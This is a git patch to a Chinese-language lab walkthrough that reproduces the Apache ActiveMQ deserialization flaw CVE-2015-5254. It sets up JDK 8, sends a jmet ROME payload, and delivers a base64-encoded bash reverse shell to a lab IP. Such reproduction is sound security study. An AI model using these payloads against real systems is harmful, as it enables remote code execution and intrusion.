From a0c04df852848f5cd26efb3aeb78ae9780805765 Mon Sep 17 00:00:00 2001
From: Threekiii <472361400@qq.com>
Date: Mon, 21 Feb 2022 13:46:17 +0800
Subject: [PATCH] =?UTF-8?q?Apache=20ActiveMQ=20=E5=8F=8D=E5=BA=8F=E5=88=97?=
 =?UTF-8?q?=E5=8C=96=E6=BC=8F=E6=B4=9E=20CVE-2015-5254.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 .../Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md | 88 +++++++++++++++----
 1 file changed, 72 insertions(+), 16 deletions(-)
diff --git a/Web服务器漏洞/Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md b/Web服务器漏洞/Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md
index 254d922..2e53d30 100644
--- a/Web服务器漏洞/Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md
+++ b/Web服务器漏洞/Apache ActiveMQ 反序列化漏洞 CVE-2015-5254.md
@@ -1,4 +1,4 @@
-# Apache ActiveMQ 反序列化漏洞 CVE-2015-5254
+# ActiveMQ Deserialization Vulnerability (CVE-2015-5254)
 ## 漏洞描述
@@ -10,9 +10,56 @@ Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套
 Apache ActiveMQ 5.13.0之前5.x版本
 ```
-## 漏洞复现
+## 环境配置
-首先下载 jmet [下载链接](https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar)
+### 安装jdk
+
+查看java版本,如果是java 11需要切换到java 8
+
+```
+java -version
+```
+
+安装java 8,默认安装路径/usr/lib/jvm/java-8-openjdk-amd64
+
+```
+sudo apt install openjdk-8-jdk
+```
+
+配置环境变量,添加jdk安装路径
+
+```
+sudo vim ~/.bashrc
+
+# 在最后一行添加
+export JAVA_HOME=/usr/lib/jvm/java-8-openjdk-amd64
+```
+
+### 切换jdk版本
+
+采用update-alternatives命令进行版本切换
+ /usr/bin/java和/usr/lib/jvm/java-8-openjdk-amd64/bin/java两个路径一定要和自己的路径吻合
+
+```
+sudo update-alternatives --install /usr/bin/java java /usr/lib/jvm/java-8-openjdk-amd64/bin/java 1070
+```
+
+切换jdk
+
+```
+sudo update-alternatives --config java
+```
+
+![image-20220221132209838](../../../Markdown/images/202202211324903-16454223573971.png)
+
+再次查看java版本,切换成功
+
+![image-20220221132246597](../../../Markdown/images/202202211324904-16454223573973.png)
+
+### 漏洞复现
+
+下载 jmet [下载链接](https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar)
 ```shell
 wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
@@ -22,29 +69,38 @@ mkdir external
 对目标发送一个生成**/tmp/vuln**的 payload
 ```plain
-java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/vuln" -Yp ROME xxx.xxx.xxx.xxx 61616
+java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/awesome_poc" -Yp ROME 192.168.174.128 61616
 ```
-访问 http://xxx.xxx.xxx.xxx:8161/admin/browse.jsp?JMSDestination=event 可以看到多了一条消息队列
+![image-20220221133654012](../../../Markdown/images/202202211345369-16454223573975.png)
-![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/1.png)
+访问 http://192.168.174.128:8161/admin/browse.jsp?JMSDestination=event 可以看到多了一条消息队列,ID为kali-38087-1645421794512-1:1:1:1:1
-点击这个信息触发文件创建
+![image-20220221133733242](../../../Markdown/images/202202211345370-16454223573977.png)
-![2](https://typora-1308934770.cos.ap-beijing.myqcloud.com/2.png)
+点击这个信息触发文件创建,成功执行命令 touch /tmp/awesome_poc
-成功执行命令创建文件,也可以创建一个反弹shell的payload
+![image-20220221133952983](../../../Markdown/images/202202211345371-16454223573979.png)
+
+![2](../../../Markdown/images/202202211324906-164542235739711.png)也可以创建一个反弹shell的payload
 ```shell
-bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9999 0>&1 (base64编码)
-YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgueHh4Lnh4eC54eHgvOTk5OSAwPiYx
+bash -i >& /dev/tcp/192.168.174.128/9999 0>&1 (base64编码)
+YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx
-bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgueHh4Lnh4eC54eHgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
+bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
-发送payload
-java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgueHh4Lnh4eC54eHgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 172.21.231.183 61616
+# 发送payload
+java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.174.128 61616
 ```
-同样点击消息队列会触发命令执行
+![image-20220221134243490](../../../Markdown/images/202202211345372-164542235739713.png)
+
+查看消息队列,ID为kali-38435-1645422155171-1:1:1:1:1
+
+![image-20220221134313545](../../../Markdown/images/202202211345373-164542235739715.png)
+
+监听9999端口,点击消息队列会触发命令执行,反弹Shell
+
+![image-20220221134508900](../../../Markdown/images/202202211345374-164542235739717.png)
-![3](https://typora-1308934770.cos.ap-beijing.myqcloud.com/3.png)
\ No newline at end of file